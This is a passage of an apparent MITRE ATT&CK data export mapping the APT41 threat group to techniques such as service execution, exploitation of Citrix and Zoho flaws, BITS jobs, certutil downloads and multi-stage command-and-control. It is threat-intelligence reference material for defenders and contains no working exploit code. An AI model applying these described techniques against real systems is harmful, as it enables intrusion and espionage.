41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used  svchost.exe and [Net](https://attack.mitre.org/software/S0039) to execute a system service installed to launch a [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--84dc2fd1-a443-4ce6-866a-c58cffc1b0f3
revoked : False
technique : Service Execution
technique_description : Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (<code>services.exe</code>) is an interface to manage and manipulate services.(Citation: Microsoft Service Control Manager) The service control manager is accessible to users via GUI components as well as system utilities such as <code>sc.exe</code> and [Net](https://attack.mitre.org/software/S0039).

[PsExec](https://attack.mitre.org/software/S0029) can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.(Citation: Russinovich Sysinternals) Tools such as [PsExec](https://attack.mitre.org/software/S0029) and <code>sc.exe</code> can accept remote servers as arguments and may be used to conduct remote execution.

Adversaries may leverage these mechanisms to execute malicious content. This can be done by either executing a new or modified service. This technique is the execution used in conjunction with [Windows Service](https://attack.mitre.org/techniques/T1543/003) during service persistence or privilege escalation.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1569.002
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--a9d4b653-6915-42af-98b2-5758c4ceee56
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) executed <code>file /bin/pwd</code> in activity exploiting CVE-2019-19781 against Citrix devices.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--a8b93875-6ad4-492e-afa1-0549ada7d7ca
revoked : False
technique : Unix Shell
technique_description : Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.004
matrix : mitre-attack
platform : ['macOS', 'Linux']
data_sources : ['Process: Process Creation', 'Command: Command Execution']
permissions_required : ['User', 'root']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has executed <code>file /bin/pwd</code> on exploited victims, perhaps to return architecture related information.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--d9416afb-0aeb-4ee3-bd96-dc331f40f37d
revoked : False
technique : File and Directory Discovery
technique_description : Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Many command shell utilities can be used to obtain this information. Examples include <code>dir</code>, <code>tree</code>, <code>ls</code>, <code>find</code>, and <code>locate</code>.(Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the [Native API](https://attack.mitre.org/techniques/T1106). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather file and directory information (e.g. <code>dir</code>, <code>show flash</code>, and/or <code>nvram</code>).(Citation: US-CERT-TA18-106A)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
technique_id : T1083
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Process: OS API Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used exploit payloads that initiate download via [ftp](https://attack.mitre.org/software/S0095).(Citation: FireEye APT41 March 2020)
relationship_id : relationship--2cd69fd0-d5ad-41db-aaee-fd58e46bfaaa
revoked : False
technique : File Transfer Protocols
technique_description : Adversaries may communicate using application layer protocols associated with transferring files to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. 

Protocols such as SMB, FTP, FTPS, and TFTP that transfer files may be very common in environments.  Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the transferred files. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1071.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--3f886f2a-874f-4333-b794-aa6075009b1c
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) exploited CVE-2020-10189 against Zoho ManageEngine Desktop Central, and CVE-2019-19781 to compromise Citrix Application Delivery Controllers (ADC) and gateway devices.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--e7fc5a89-f5a7-432f-a885-6b9532153e7e
revoked : False
technique : Exploit Public-Facing Application
technique_description : Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network. The weakness in the system can be a software bug, a temporary glitch, or a misconfiguration.

Exploited applications are often websites/web servers, but can also include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other system with Internet accessible open sockets.(Citation: NVD CVE-2016-6662)(Citation: CIS Multiple SMB Vulnerabilities)(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks)(Citation: NVD CVE-2014-7169) Depending on the flaw being exploited this may also involve [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211). 

If an application is hosted on cloud-based infrastructure and/or is containerized, then exploiting it may lead to compromise of the underlying instance or container. This can allow an adversary a path to access the cloud or container APIs, exploit container host access via [Escape to Host](https://attack.mitre.org/techniques/T1611), or take advantage of weak identity and access management policies.

Adversaries may also exploit edge network infrastructure and related appliances, specifically targeting devices that do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)

For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='initial-access')]
technique_id : T1190
matrix : mitre-attack
platform : ['Windows', 'IaaS', 'Network', 'Linux', 'macOS', 'Containers']
data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--c8e87b83-edbb-48d4-9295-4974897525b7
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used [BITSAdmin](https://attack.mitre.org/software/S0190) to download and install payloads.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--d316289b-26fa-49d7-8ed0-3fa56cc858b7
revoked : False
technique : BITS Jobs
technique_description : Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM).(Citation: Microsoft COM)(Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.

The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1059/001) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool.(Citation: Microsoft BITS)(Citation: Microsoft BITSAdmin)

Adversaries may abuse BITS to download (e.g. [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)), execute, and even clean up after running malicious code (e.g. [Indicator Removal](https://attack.mitre.org/techniques/T1070)). BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls.(Citation: CTU BITS Malware June 2016)(Citation: Mondok Windows PiggyBack BITS May 2007)(Citation: Symantec BITS May 2007) BITS enabled execution may also enable persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots).(Citation: PaloAlto UBoatRAT Nov 2017)(Citation: CTU BITS Malware June 2016)

BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).(Citation: CTU BITS Malware June 2016)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1197
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'Network Traffic: Network Connection Creation', 'Process: Process Creation', 'Service: Service Metadata']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--84e02621-8fdf-470f-bd58-993bb6a89d91
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used the storescyncsvc.dll BEACON backdoor to download a secondary backdoor.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--f234930f-f7d1-458d-8c79-c73538990f97
revoked : False
technique : Multi-Stage Channels
technique_description : Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://attack.mitre.org/techniques/T1008) in case the original first-stage communication path is discovered and blocked.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1104
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)

aliases : ['APT41', 'Wicked Panda']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double DragonAPT41, a dual espionage andcyber crime operationAPT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double DragonAPT41, a dual espionage and cyber crime operation APT41. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used [certutil](https://attack.mitre.org/software/S0160) to download additional files.(Citation: FireEye APT41 March 2020)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Group IB APT 41 June 2021)
relationship_id : relationship--b42c23c9-99f4-4b1f-91e2-a945a119fe98
revoked : False
technique : Ingress Tool Transfer
technique_description : Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as [ftp](https://attack.mitre.org/software/S0095). Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. [Lateral Tool Transfer](https://attack.mitre.org/techniques/T1570)). 

